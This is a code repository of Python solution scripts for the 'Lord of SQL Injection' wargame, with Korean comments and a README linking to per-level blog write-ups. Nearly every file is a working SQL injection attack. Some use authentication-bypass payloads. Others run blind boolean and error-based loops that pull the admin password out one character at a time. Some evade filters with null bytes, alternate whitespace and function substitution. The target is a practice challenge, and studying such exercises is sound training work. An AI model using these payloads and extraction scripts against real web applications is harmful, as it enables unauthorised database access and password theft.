├── 10_Skeleton.py ├── 11_Golem.py ├── 12_Darknight.py ├── 13_Bugbear.py ├── 14_Giant.py ├── 15_Assassin.py ├── 16_Zombie_Assassin.py ├── 17_Succubus.py ├── 18_Nightmare.py ├── 19_Xavis.py ├── 1_Gremline.py ├── 21_Iron_golem.py ├── 22_Dark_eyes.py ├── 2_Cobolt.py ├── 3_Goblin.py ├── 4_Orc.py ├── 5_Wolfman.py ├── 6_DarkElf.py ├── 7_Orge.py ├── 8_Troll.py ├── 9_Vampire.py └── README.md /10_Skeleton.py: -------------------------------------------------------------------------------- 1 | # - *- coding : UTF-8 -*- 2 | from requests import get 3 | 4 | #URL을 설정합니다. 5 | url = "http://los.eagle-jump.org/skeleton_8d9cbfe1efbd44cfbbdc63fa605e5f1b.php" 6 | param = "?pw=%27||id=%27admin%27%23" 7 | new_url = url + param 8 | 9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다. 10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5") 11 | 12 | 13 | #HTTP 요청을 보냅니다. 14 | r = get(new_url, cookies=cookies) 15 | 16 | if r.text.find("

SKELETON Clear!

") > 0: 17 | print("축하합니다! Skeleton을 클리어했습니다!") 18 | 19 | -------------------------------------------------------------------------------- /11_Golem.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # coding: utf-8 3 | 4 | import requests 5 | import sys # module for exit() 6 | from sys import stdout # module for fflush() 7 | 8 | 9 | print("#### Lord of SQL Injection - Golem ####\n") 10 | 11 | # URL을 설정합니다. 12 | url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php" 13 | 14 | session = raw_input("Input your LOS session : ") 15 | # session = "lqaa55h0s48l8h06rc9sguktt0" 16 | 17 | # Set header to set cookie 18 | headers = { 19 | 'Cookie': 'PHPSESSID={0}'.format(session) 20 | } 21 | 22 | 23 | """ The valuble for storing admin password """ 24 | password = "" 25 | 26 | query = 0 27 | 28 | 29 | 30 | """ 31 | No Hack Words : 32 | - prob 33 | - _ 34 | - . 35 | - () 36 | - or 37 | - and 38 | - substr( 39 | - = 40 | 41 | """ 42 | 43 | 44 | def replace(param): 45 | param = str(param) 46 | 47 | param = param.replace("or", "||") 48 | param = param.replace("and", "%26%26") 49 | param = param.replace("=", " like ") 50 | param = param.replace("substr(", "mid(") 51 | param = param.replace("#", "%23") 52 | 53 | if "prob" in param: 54 | print "Your param has 'prob'!" 55 | sys.exit() 56 | 57 | return param 58 | 59 | 60 | 61 | # get the length of password 62 | for i in range(100): 63 | param = replace("' or length(pw)={0}#".format(i)) 64 | content = requests.get(url + "?pw=" + param, headers=headers).text 65 | 66 | if content.find("

Hello admin

") > -1: 67 | length = i 68 | print "[*] The length of pw : {0}".format(i) 69 | 70 | break 71 | 72 | 73 | 74 | print("\n\n#### Starting Blind SQL Injection ####\n") 75 | for i in range(1, length + 1): 76 | binary = '' 77 | for j in range(0, 8): 78 | param = "?pw=' || id like 'admin' %26%26 (select mid(lpad(bin(ascii(mid(pw,{0},1))),7,0),{1},1) like 1)%23".format(i, j) 79 | content = requests.get(url + param, headers=headers).text 80 | query += 1 81 | 82 | if content.find("Hello admin") > 0: 83 | binary += '1' 84 | else: 85 | binary += '0' 86 | 87 | password += chr(int(binary, 2)) 88 | 89 | print chr(int(binary, 2)), "({0})".format(binary) 90 | stdout.flush() 91 | 92 | print "\n[*] the password : ", password 93 | 94 | 95 | 96 | url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw={0}".format(password) 97 | r = requests.get(url, headers=headers) 98 | 99 | if r.text.find("

GOLEM Clear!

") > 0: 100 | print "[*] message : Golem Clear!" 101 | 102 | print "[*] total queries : {0}".format(query) 103 | 104 | -------------------------------------------------------------------------------- /12_Darknight.py: -------------------------------------------------------------------------------- 1 | # -*- coding : UTF-8 -*- 2 | from requests import get 3 | import string 4 | 5 | print("#### Lord of SQL Injection - Darknight ####\n") 6 | 7 | # URL을 설정합니다. 8 | url = "http://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php" 9 | 10 | #쿠키를 세팅합니다. 반드시 당신의 쿠키로 설정해야 합니다. 11 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5") 12 | abc = string.digits + string.ascii_letters #ASCII의 문자를 저장합니다. (브루트포스할 때 필요) 13 | result = "" 14 | 15 | #pw의 길이를 게싱합니다. 16 | for i in range(1,20): 17 | param = "?no=1 || ord(id) like 97 %26%26length(pw) like " + str(i) 18 | new_url = url + param 19 | r = get(new_url, cookies=cookies) 20 | 21 | if r.text.find("

Hello admin

") > 0: 22 | idLength = i + 1 23 | print("pw의 길이는 " + str(i) + " 입니다.") 24 | break 25 | 26 | 27 | #얻은 정보를 바탕으로 블라인드 SQL Injection을 진행합니다. 28 | print("\n\n#### Starting Blind SQL Injection ####\n") 29 | for i in range(1, idLength): 30 | for a in abc: 31 | param = "?no=1 or ord(id) like 97 %26%26 ord(mid(pw," + str(i) + ",1)) <> " + str(ord(a)) 32 | new_url = url + param 33 | r = get(new_url, cookies=cookies) 34 | 35 | if r.text.find("

Hello admin

") == -1: 36 | print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ") 37 | result += a 38 | break 39 | 40 | if i == 1 and result == "": 41 | print("FAIL") 42 | exit(-1) 43 | 44 | if i == idLength-1: 45 | print("\n\n#### RESULT ####") 46 | print("pw : " + result) 47 | 48 | url = "http://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?pw=" + result 49 | r = get(url, cookies=cookies) 50 | 51 | if r.text.find("

DARKKNIGHT Clear!

") > 0: 52 | print("축하합니다! Darknight를 클리어했습니다.") 53 | 54 | -------------------------------------------------------------------------------- /13_Bugbear.py: -------------------------------------------------------------------------------- 1 | # -*- coding : UTF-8 -*- 2 | from requests import get 3 | import string 4 | 5 | print("#### Lord of SQL Injection - Bugbear ####\n") 6 | 7 | # URL을 설정합니다. 8 | url = "http://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php" 9 | 10 | #쿠키를 세팅합니다. 반드시 당신의 쿠키로 설정해야 합니다. 11 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5") 12 | abc = string.digits + string.ascii_letters #ASCII의 문자를 저장합니다. (브루트포스할 때 필요) 13 | result = "" 14 | 15 | #pw의 길이를 게싱합니다. 16 | for i in range(1,20): 17 | param = "?no=1||hex(mid(id,1,1))in(61)%26%26length(pw)<>" + str(i) 18 | new_url = url + param 19 | r = get(new_url, cookies=cookies) 20 | 21 | if r.text.find("

Hello admin

") == -1: 22 | idLength = i + 1 23 | print("pw의 길이는 " + str(i) + " 입니다.") 24 | break 25 | 26 | 27 | #얻은 정보를 바탕으로 블라인드 SQL Injection을 진행합니다. 28 | print("\n\n#### Starting Blind SQL Injection ####\n") 29 | for i in range(1, idLength): 30 | for a in abc: 31 | ab = str(hex(ord(a))).replace("0x", "") 32 | param = "?no=1||hex(mid(id,1,1))in(61)%26%26hex(mid(pw," + str(i) + ",1))<>" + ab 33 | new_url = url + param 34 | r = get(new_url, cookies=cookies) 35 | 36 | if r.text.find("

Hello admin

") == -1: 37 | print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ") 38 | result += a 39 | break 40 | 41 | if i == 1 and result == "": 42 | print("FAIL") 43 | exit(-1) 44 | 45 | if i == idLength-1: 46 | print("\n\n#### RESULT ####") 47 | print("pw : " + result) 48 | 49 | url = "http://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?pw=" + result 50 | r = get(url, cookies=cookies) 51 | 52 | if r.text.find("

BUGBEAR Clear!

") > 0: 53 | print("축하합니다! Bugbear를 클리어했습니다.") 54 | 55 | -------------------------------------------------------------------------------- /14_Giant.py: -------------------------------------------------------------------------------- 1 | # - *- coding : UTF-8 -*- 2 | from requests import get 3 | import random 4 | 5 | #URL을 설정합니다. 6 | url = "http://los.eagle-jump.org/giant_9e5c61fc7f0711c680a4bf2553ee60bb.php" 7 | 8 | #유효한 개행 문자들을 저장합니다. 9 | new_tab = ["%0b", "%0c"] 10 | 11 | #위의 개행 문자 둘 중 하나를 선택합니다. 12 | rand_int = random.randint(0,1) 13 | param = "?shit=" + new_tab[rand_int] 14 | new_url = url + param 15 | 16 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다. 17 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5") 18 | 19 | 20 | #HTTP 요청을 보냅니다. 21 | r = get(new_url, cookies=cookies) 22 | 23 | if r.text.find("

GIANT Clear!

") > 0: 24 | print("축하합니다! Giant을 클리어했습니다!") 25 | 26 | -------------------------------------------------------------------------------- /15_Assassin.py: -------------------------------------------------------------------------------- 1 | # -*- coding : UTF-8 -*- 2 | from requests import get 3 | import string 4 | 5 | print("#### Lord of SQL Injection - Assassin ####\n") 6 | 7 | # URL을 설정합니다. 8 | url = "http://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php" 9 | 10 | #쿠키를 세팅합니다. 반드시 당신의 쿠키로 설정해야 합니다. 11 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5") 12 | 13 | #ASCII의 문자를 저장합니다. (브루트포스할 때 필요) 14 | abc = string.digits + string.ascii_letters 15 | 16 | result = "" 17 | 18 | #얻은 정보를 바탕으로 블라인드 SQL Injection을 진행합니다. 19 | print("\n\n#### Starting Blind SQL Injection ####\n") 20 | identify = 0 21 | for i in range(1,20): 22 | for a in abc: 23 | param = "?pw=" + result + a + "%" 24 | new_url = url + param 25 | r = get(new_url, cookies=cookies) 26 | 27 | if r.text.find("

Hello guest

") > 0: 28 | identify = 1 29 | print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ") 30 | result += a 31 | if r.text.find("

ASSASSIN Clear!

") > 0: 32 | print("축하합니다! Orge를 클리어했습니다.") 33 | 34 | 35 | if len(result) < (i-1): 36 | break 37 | 38 | print("\n\n#### RESULT ####") 39 | print("pw : " + result) 40 | -------------------------------------------------------------------------------- /16_Zombie_Assassin.py: -------------------------------------------------------------------------------- 1 | # - *- coding : UTF-8 -*- 2 | from requests import get 3 | 4 | #URL을 설정합니다. 5 | url = "http://los.eagle-jump.org/zombie_assassin_14dfa83153eb348c4aea012d453e9c8a.php" 6 | param = "?pw=%00%27or%271%27=%271" 7 | new_url = url + param 8 | 9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다. 10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5") 11 | 12 | 13 | #HTTP 요청을 보냅니다. 14 | r = get(new_url, cookies=cookies) 15 | 16 | if r.text.find("

ZOMBIE_ASSASSIN Clear!

") > 0: 17 | print("축하합니다! Zombie assassin을 클리어했습니다!") 18 | 19 | -------------------------------------------------------------------------------- /17_Succubus.py: -------------------------------------------------------------------------------- 1 | # - *- coding : UTF-8 -*- 2 | from requests import get 3 | 4 | #URL을 설정합니다. 5 | url = "http://los.eagle-jump.org/succubus_8ab2d195be2e0b10a3b5aa2873d0863f.php" 6 | param = "?id=asdf\&pw=or%201=1%23" 7 | new_url = url + param 8 | 9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다. 10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5") 11 | 12 | 13 | #HTTP 요청을 보냅니다. 14 | r = get(new_url, cookies=cookies) 15 | 16 | if r.text.find("

SUCCUBUS Clear!

") > 0: 17 | print("축하합니다! Succubus를 클리어했습니다!") 18 | 19 | -------------------------------------------------------------------------------- /18_Nightmare.py: -------------------------------------------------------------------------------- 1 | # - *- coding : UTF-8 -*- 2 | from requests import get 3 | 4 | #URL을 설정합니다. 5 | url = "http://los.eagle-jump.org/nightmare_ce407ee88ba848c2bec8e42aaeaa6ad4.php" 6 | param = "?pw=%27)<1;%00" 7 | new_url = url + param 8 | 9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다. 10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5") 11 | 12 | 13 | #HTTP 요청을 보냅니다. 14 | r = get(new_url, cookies=cookies) 15 | 16 | if r.text.find("

NIGHTMARE Clear!

") > 0: 17 | print("축하합니다! Nightmare를 클리어했습니다!") 18 | 19 | -------------------------------------------------------------------------------- /19_Xavis.py: -------------------------------------------------------------------------------- 1 | # -*- coding : UTF-8 -*- 2 | # pw의 모든 값의 아스키값이 160이 넘기 때문에 효율성 문제로 160부터 시작했습니다. 3 | import requests 4 | 5 | # Set cookies 6 | cookies = dict(PHPSESSID='gsen5qt14q70cvj5doeee5lvp1') 7 | 8 | result = "" 9 | hexacode = '0x' 10 | for i in range(1,11): 11 | print("-" * 25) 12 | print("[=] Testing %d character" % i) 13 | print('-' * 25) 14 | for ascii in range(160, 1000): 15 | if i == 2 or i == 6: 16 | ascii += 40 17 | url = 'http://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php' 18 | url += "?pw=1'||ord(id)=97%26%26ord(mid(pw,{0},1))={1}%23".format(i, ascii) 19 | #print "[=] Testing url : " + url 20 | 21 | r = requests.get(url, cookies=cookies) 22 | 23 | if r.text.find("Hello admin") > -1: 24 | char = chr(ascii) 25 | hexacode += str(hex(ascii)).replace('0x', '') 26 | print("\n[*] %d character is %s (ascii code : %d)\n\n" % (i, char, ascii)) 27 | result += char 28 | break 29 | 30 | print("\n\n\n[*] admin's password : %s(hexacode : %s)" % (result, hexacode)) 31 | 32 | 33 | -------------------------------------------------------------------------------- /1_Gremline.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # coding: utf-8 3 | 4 | from requests import get 5 | 6 | 7 | url = "http://los.eagle-jump.org/gremlin_bbc5af7bed14aa50b84986f2de742f31.php" 8 | 9 | # Set PHPSESSID by user input 10 | session = input("Input your LOS session : ") 11 | # session = "gequo9hff2f19sjmieftjnuf50" 12 | 13 | headers = { 14 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 15 | 'Accept-Encoding': 'gzip, deflate, br', 16 | 'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4', 17 | 'Cookie': 'PHPSESSID={0}'.format(session) 18 | } 19 | 20 | param = "?id='or'1'='1'%23" 21 | 22 | r = get(url + param , headers=headers) 23 | 24 | if r.text.find("

GREMLIN Clear!

") > 0: 25 | print("Gremlin Clear!") 26 | -------------------------------------------------------------------------------- /21_Iron_golem.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # coding: utf-8 3 | import requests 4 | 5 | # Set cookies 6 | cookies = dict(PHPSESSID="gequo9hff2f19sjmieftjnuf50") 7 | 8 | 9 | 10 | # pw Length guessing 11 | print("Starting pw guessing") 12 | for i in range(1, 100): 13 | url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php" 14 | payload = "?pw=1'||if(length(pw)="+str(i)+",1,(select%201%20union%20select%202))%23" 15 | url += payload 16 | 17 | r = requests.get(url, cookies=cookies) 18 | if r.text.find("Subquery returns more than 1 row") > -1: 19 | print("[*] pw의 길이는 %2d가 아닙니다. " % i) 20 | else : 21 | print("[*] pw의 길이는 %2d입니다!" % i) 22 | length = i 23 | break 24 | 25 | 26 | # start pwning 27 | print("\n\n\n") 28 | print("[+] Configuring pw") 29 | for i in range(1, length+1): 30 | pwn = 31 31 | url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php" 32 | payload = "?pw=1%27||if(ord(mid(pw,"+str(i)+",1))>"+str(pwn)+",1,(select%201%20union%20select%202))%23" 33 | url += payload 34 | 35 | r = requests.get(url, cookies=cookies) 36 | if r.text.find("Subquery returns more than 1 row") > -1: 37 | print("[*] pw의 %2d번째에 값이 없습니다." % (i)) 38 | else : 39 | print("[*] pw의 %2d번째에 값이 있습니다!" % (i)) 40 | 41 | 42 | print("\n\n\n") 43 | result = "" 44 | print("[+] Starting to pwn") 45 | for i in range(1,5): 46 | for j in range(pwn, 100): 47 | url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php" 48 | payload = "?pw=1%27||if(ord(mid(pw,"+str(i)+",1))="+str(j)+",1,(select%201%20union%20select%202))%23" 49 | url += payload 50 | 51 | r = requests.get(url, cookies=cookies) 52 | if r.text.find("Subquery returns more than 1 row") > -1: 53 | print("[*] pw의 %d번째 값은 %d가 아닙니다. " % (i, j)) 54 | else : 55 | print("[*] pw의 %d번째 값은 %d입니다! " % (i, j)) 56 | result += chr(j) 57 | break 58 | 59 | print("\n\n\n[+] result : " + result + "\n") 60 | -------------------------------------------------------------------------------- /22_Dark_eyes.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding : UTF-8 -*- 3 | 4 | import requests 5 | import string 6 | 7 | # url encoding 8 | def urlQuery(url): 9 | url = url.replace("#", "%23") 10 | url = url.replace(" ", "%20") 11 | url = url.replace("'", "%27") 12 | url = url.replace("&", "%26%26") 13 | url = url.replace(">", "%3E") 14 | url = url.replace("<", "%3C") 15 | 16 | return url 17 | 18 | cookies = dict(PHPSESSID="8nprcactb6uekd9ocb96q3fh17") 19 | url = "http://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php" 20 | 21 | 22 | abc = string.ascii_letters + string.digits + "!@#$%^&*()_-{}[];:><,./?" 23 | 24 | # select * from test where id='admin' and pw='' or ord(id)=97 and (length(pw)=0 or (select 1 union select pw)) 25 | 26 | 27 | 28 | # pw length config 29 | print("[+] pw length config \n") 30 | for i in range(0, 100): 31 | payload = "?pw=' OR ord(id)=97 and (length(pw)=" + str(i) + " or (select 1 union select pw))#" 32 | payload = urlQuery(payload) 33 | r = requests.get(url+payload, cookies=cookies) 34 | 35 | if len(r.text) < 5: 36 | print("[-] Err0r was f0und. - the length of the 'pw' is not " + str(i)) 37 | else : 38 | print("[*] the length of 'pw' is " + str(i)) 39 | length = i 40 | break 41 | 42 | result = "" 43 | print("\n\n=====================\n\nblind sqli start\n") 44 | for i in range(1, (length+1)): 45 | for a in abc: 46 | payload = "?pw=' OR ord(id)=97 AND (ord(mid(pw,"+str(i)+",1))="+str(ord(a))+\ 47 | " or (select 1 union select pw))%23" 48 | 49 | r = requests.get(url+payload, cookies=cookies) 50 | 51 | if len(r.text) < 5: 52 | print("[-] Err0r was f0und. (%d, %c)" %(i, a)) 53 | else: 54 | print("[*] the %d pw is %c" % (i, a)) 55 | result += a 56 | break 57 | 58 | print("[=] the result : " + result) 59 | -------------------------------------------------------------------------------- /2_Cobolt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # coding: utf-8 3 | import requests 4 | 5 | url = "http://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php" 6 | param = "?id=admin'%23" 7 | 8 | cookie = input("Input your session : ") 9 | # cookie = "5u71g5vp7547tv8ffl7osl0fl5" 10 | 11 | headers = { 12 | 'Cookie': cookie 13 | } 14 | 15 | r = requests.get(url + param, headers=headers) 16 | 17 | if r.text.find("

COBOLT Clear!

") > 0: 18 | print("Cobolt Clear!") 19 | -------------------------------------------------------------------------------- /3_Goblin.py: -------------------------------------------------------------------------------- 1 | # -*- coding : UTF-8 -*- 2 | from requests import get 3 | 4 | url = "http://los.eagle-jump.org/goblin_5559aacf2617d21ebb6efe907b7dded8.php" 5 | #MySQL의 substr() 함수를 이용하여 문제를 풉니다. 6 | param = "?no=0%20or%20ascii(substr(id,1,1))=97" 7 | 8 | new_url = url + param 9 | 10 | #쿠리를 설정합니다. 반드시 당신의 쿠키로 설정해주세요. 11 | cookie = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5") 12 | 13 | 14 | r = get(new_url, cookies=cookie) 15 | if r.text.find("

GOBLIN Clear!

") > 0: 16 | print("축하합니다! Goblin을 클리어했습니다!") 17 | -------------------------------------------------------------------------------- /4_Orc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: UTF-8 -*- 3 | import requests 4 | from sys import stdout 5 | 6 | query = 0 7 | print("#### Lord of SQL Injection - Orc ####\n") 8 | 9 | url = "http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php" 10 | 11 | 12 | # session = "gequo9hff2f19sjmieftjnuf50" 13 | session = raw_input("Input your LOS session : ") 14 | 15 | headers = { 16 | 'Cookie': 'PHPSESSID={0}'.format(session) 17 | } 18 | 19 | password = "" 20 | 21 | # get the length of password 22 | for i in range(100): 23 | param = "?pw=' or id='admin' and length(pw)={0}%23".format(i) 24 | 25 | content = requests.get(url + param, headers=headers).text 26 | query += 1 27 | 28 | if content.find("Hello admin") > -1: 29 | length = i 30 | print "[*] The length of admin password : {0}".format(i) 31 | break 32 | 33 | 34 | print("\n\n#### Starting Blind SQL Injection ####\n") 35 | # substr(lpad(bin(ascii(substr('asdf',1,1))),7,0),1,1) 36 | 37 | print "[*] the password : ", 38 | stdout.flush() 39 | 40 | for i in range(1, length+1): 41 | 42 | binary = '' 43 | for j in range(0, 8): 44 | param = "?pw=' or id='admin' and (select substr(lpad(bin(ascii(substr(pw,{0},1))),7,0),{1},1)=1)%23".format(i, j) 45 | content = requests.get(url + param, headers=headers).text 46 | query += 1 47 | 48 | if content.find("Hello admin") > 0: 49 | binary += '1' 50 | else: 51 | binary += '0' 52 | 53 | password += chr(int(binary, 2)) 54 | 55 | print chr(int(binary, 2)), 56 | stdout.flush() 57 | 58 | print "\n[*] the password : ", password 59 | 60 | 61 | url = "http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw={0}".format(password) 62 | content = requests.get(url + param, headers=headers).content 63 | 64 | if content.find("

ORC Clear!

") > 0: 65 | print "ORC Clear!" 66 | 67 | print "[+] total query : {0}".format(query) -------------------------------------------------------------------------------- /5_Wolfman.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # coding: utf-8 3 | 4 | import requests 5 | import urllib 6 | 7 | 8 | def urlencode(query): 9 | replacement = { 10 | '#': '%23', 11 | '&': '%26', 12 | ' ': '%20', 13 | '=': '%3D', 14 | '+': '%2B', 15 | '\'': '%27', 16 | '%': '%25' 17 | } 18 | 19 | for r in replacement: 20 | query.replace(r, replacement[r]) 21 | 22 | return query 23 | 24 | #URL을 설정합니다. 25 | url = "http://los.eagle-jump.org/wolfman_f14e72f8d97e3cb7b8fe02bef1590757.php" 26 | param = urlencode("?pw='||id='admin'%23") 27 | 28 | 29 | session = input("Input your LOS session : ") 30 | headers = { 31 | 'Cookie': 'PHPSESSID={0}'.format(session) 32 | } 33 | 34 | 35 | r = requests.get(url + param, headers=headers) 36 | 37 | if r.text.find("

WOLFMAN Clear!

") > 0: 38 | print "Wolfman Clear!" 39 | 40 | -------------------------------------------------------------------------------- /6_DarkElf.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # coding: utf-8 3 | 4 | import requests 5 | 6 | url = "http://los.eagle-jump.org/darkelf_6e50323a0bfccc2f3daf4df731651f75.php" 7 | param = "?pw=%27||id=%27admin" 8 | 9 | session = raw_input("Input your LOS session : ") 10 | # session = "gequo9hff2f19sjmieftjnuf50" 11 | 12 | headers = { 13 | 'Cookie': 'PHPSESSID={0}'.format(session) 14 | } 15 | 16 | 17 | r = requests.get(url + param, headers=headers) 18 | 19 | if r.text.find("

DARKELF Clear!

") > 0: 20 | print("DarkElf Clear!") 21 | 22 | -------------------------------------------------------------------------------- /7_Orge.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # coding: utf-8 3 | 4 | import requests 5 | from sys import stdout 6 | 7 | print("#### Lord of SQL Injection - Orge ####\n") 8 | 9 | url = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php" 10 | 11 | session = raw_input("Input your LOS session : ") 12 | # session = "lqaa55h0s48l8h06rc9sguktt0" 13 | 14 | headers = { 15 | 'Cookie': 'PHPSESSID={0}'.format(session) 16 | } 17 | 18 | password = "" 19 | query = 0 20 | 21 | 22 | # guess the length of password 23 | for i in range(100): 24 | param = "?pw=' || id='admin' %26%26 length(pw)={0}%23".format(i) 25 | r = requests.get(url + param, headers=headers) 26 | query += 1 27 | 28 | if r.text.find("

Hello admin

") > 0: 29 | length = i 30 | print "[*] The length of 'pw' is {0}".format(i) 31 | break 32 | 33 | 34 | 35 | 36 | print("\n\n#### Starting Blind SQL Injection ####\n") 37 | for i in range(1, length + 1): 38 | binary = '' 39 | for j in range(0, 8): 40 | param = "?pw=' || id='admin' %26%26 (select substr(lpad(bin(ascii(substr(pw,{0},1))),7,0),{1},1)=1)%23".format(i, j) 41 | content = requests.get(url + param, headers=headers).text 42 | query += 1 43 | 44 | if content.find("Hello admin") > 0: 45 | binary += '1' 46 | else: 47 | binary += '0' 48 | 49 | password += chr(int(binary, 2)) 50 | 51 | print chr(int(binary, 2)), "({0})".format(binary) 52 | stdout.flush() 53 | 54 | print "\n[*] the password : ", password 55 | 56 | 57 | url = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw=" + password 58 | r = requests.get(url, headers=headers) 59 | 60 | if r.text.find("

ORGE Clear!

") > 0: 61 | print "[*] message : Orge Clear!" 62 | 63 | print "[*] total queries : {0}".format(query) -------------------------------------------------------------------------------- /8_Troll.py: -------------------------------------------------------------------------------- 1 | # - *- coding : UTF-8 -*- 2 | from requests import get 3 | 4 | #URL을 설정합니다. 5 | url = "http://los.eagle-jump.org/troll_6d1f080fa30a07dbaf7342285ba0e158.php" 6 | param = "?id=admIn" 7 | new_url = url + param 8 | 9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다. 10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5") 11 | 12 | 13 | #HTTP 요청을 보냅니다. 14 | r = get(new_url, cookies=cookies) 15 | 16 | if r.text.find("

TROLL Clear!

") > 0: 17 | print("축하합니다! Troll을 클리어했습니다!") 18 | 19 | -------------------------------------------------------------------------------- /9_Vampire.py: -------------------------------------------------------------------------------- 1 | # - *- coding : UTF-8 -*- 2 | from requests import get 3 | 4 | #URL을 설정합니다. 5 | url = "http://los.eagle-jump.org/vampire_0538b0259b6680c1ca4631a388177ed4.php" 6 | param = "?id=admadminin" 7 | new_url = url + param 8 | 9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다. 10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5") 11 | 12 | 13 | #HTTP 요청을 보냅니다. 14 | r = get(new_url, cookies=cookies) 15 | 16 | if r.text.find("

VAMPIRE Clear!

") > 0: 17 | print("축하합니다! Vampire을 클리어했습니다!") 18 | 19 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Lord-of-SQL-Injection 2 | Lord of SQL Injection (주석은 한글로 작성되어 있습니다. / Comments were written in Korean!) 3 | 4 | 1. Gremlin : http://chaneyoon.tistory.com/51 5 | 2. Cobolt : http://chaneyoon.tistory.com/52 6 | 3. Goblin : http://chaneyoon.tistory.com/53 7 | 4. Orc : http://chaneyoon.tistory.com/54 8 | 5. Wolfman : http://chaneyoon.tistory.com/55 9 | 6. Darkelf : http://chaneyoon.tistory.com/56 10 | 7. Orge : http://chaneyoon.tistory.com/57 11 | 8. Troll : http://chaneyoon.tistory.com/58 12 | 9. Vampire : http://chaneyoon.tistory.com/59 13 | 10. Skeleton : http://chaneyoon.tistory.com/60 14 | 11. Golem : http://chaneyoon.tistory.com/61 15 | 12. Darknight : http://chaneyoon.tistory.com/62 16 | 13. Bugbear : http://chaneyoon.tistory.com/63 17 | 14. Giant : http://chaneyoon.tistory.com/64 18 | 15. Assassin : http://chaneyoon.tistory.com/65 19 | 16. Assassin_Zombie : http://chaneyoon.tistory.com/66 20 | 21. Iron_golem : http://chaneyoon.tistory.com/107 21 | 22 | 23 | --------------------------------------------------------------------------------